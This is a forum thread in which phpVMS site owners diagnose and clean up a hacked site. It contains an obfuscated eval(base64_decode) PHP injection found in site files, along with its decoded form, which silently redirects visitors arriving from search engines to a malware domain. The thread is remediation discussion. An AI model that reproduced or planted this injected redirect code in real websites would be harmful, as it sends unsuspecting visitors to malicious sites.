Mal ware

[RogerB]

I had my provider run a malware scan on my site, they found nothing. I joined a malware site that my host uses and they are saying much of phpvms code is malware.....Anyone else run into this?

[mark1million]

Nope, what's the site you are using?

[RogerB]

Sitelock. If you google this, you will see. site:kesukvirtual.com its showing regular pages as malware. stupid.

[Kyle]

Roger I got it in Google and firefox.

Someone's is f***ing with everyone here at phpVMS.

[Tom]

Roger do you mean the whole 'This site may harm your device/computer' thing under links? That's all I see that looks abnormal, and that would be expected on the entire site if they suspect malware anywhere on the domain.

And Vansers are you getting it on your site? :s

[mark1million]

Guys all the base package is OK, fine, its when you start adding skins and other scripts without verifying what they can do or create on your server, then there becomes a problem.

If other links are placed anywhere on a domain to a site that has been associated as hosting malware then you will most probably get a warning message about it which makes sense.

Thing to remember is look at every script before you put on your site or use, if you dont understand what it can do then dont put it on.

[Nabeel]

Wait, what?

[Kyle]

And Vansers are you getting it on your site? :s

No, I don't have a site, I mean, I been seeing some phpVMS VA's getting that.

[Kyle]

Wait, what?

You confused with Mark's post? or My Post?

[RogerB]

Ok, I am finding this code in some of my files, I also found it in the action.php for phpvms, and I don't remember it being there before.

eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2ZnaGhnaGZzNmZnLm9zYS5wbC8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0="));

[Tom]

Decoded as follows

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){		
	header("Location: http://fghhghfs6fg.osa.pl/");
	exit();
}
}
}

[mark1million]

That is a known malware site!!!!!

What ever code was in your scripts it would appear that it has written a redirect to that url, Not a good outcome as you dont know where else it has written that meta redirect.

Roger that defiantly does NOT belong in the action.php

[RogerB]

I just did an update to get rid of it. I am also finding it in my forum files. I think its all cleaned up. question is, how did it get there.

[RogerB]

Decode where Tom? Where ever I see it?

[Kyle]

That's the main question!

Roger, lock all up your files with .htaccess that mark showed how to.

[mark1million]

Thing is malware is hidden in scripts and will usually look for folders it has permissions to write to, so once you upload a js file or unknown content then potentially every file / folder it can write to it will do to try in this case redirect to a booby trapped site for what ever reason.

Its a right pain to get rid of and fully make sure you are free, its a time consuming task that must be done.

In your example above anyone reaching your site from the popular search engines will be redirected to that site defined in the decode.

[Kyle]

Very interesting mark. I didn't really know any of the js triggers to work up on the file permission..... So we are seeing that the virus was from the js file in Rogers skin.

Thats the thing we need to smeck the flies first, but now I started skinnig my own so I dont use released skins.

I think we should keep on eye on that so we don't have malware or anything in the servers.

[Tom]

Roger I decoded the base 64. That is the code it's adding into your pages.

Seeing as I don't believe phpVMS uses any base 64 you should remove EVERY instance of it.

[flyalaska]

Did you ever figure out how you got it?

[Kyle]

Hey Eddie, The Vuris came from the JS which was going to be released but it's off, because the JS that Roger has that was a virus. Which he didn't know......

My server was so messed up and messed up over a lot of files. Took me two days to get the server online again.

[RogerB]

I didn't get it from that java script, I don't use it on kesuk. I still have no idea how that stuff got on my server. I believe its all gone now

[flyalaska]

I wast there on Google Chrome, Big red page with this in it.

Warning: Something's Not Right Here!

www.kesukvirtual.com contains malware. Your computer might catch a virus if you visit this site.

Google has found malicious software may be installed onto your computer if you proceed. If you've visited this site in the past or you trust this site, it's possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.

[Kyle]

That's weird, so your site is still malware. I hope it will be gone soon.

[RogerB]

I believe its all gone, I am waiting for approval from them...if not they can suck donkey nuts.

[joeri]

I believe its all gone, I am waiting for approval from them...if not they can suck donkey nuts.

Don't hurt donkey's feelings

[RogerB]

LOL...I am using site lock right now. waiting for my next scan. I really don't know why I can't cotrol the scans...so stupid...

[RogerB]

I did find info on this mal ware it was also getting into .css files. Kesuk is clean now. Only issue left was my favicon link. Weird.

[RogerB]

Message is gone!! woo hoo. success!!!

[mark1million]

Great job Roger!

[Kyle]

Glad Your Back!!!

Hopefully those malware s*** will not happen.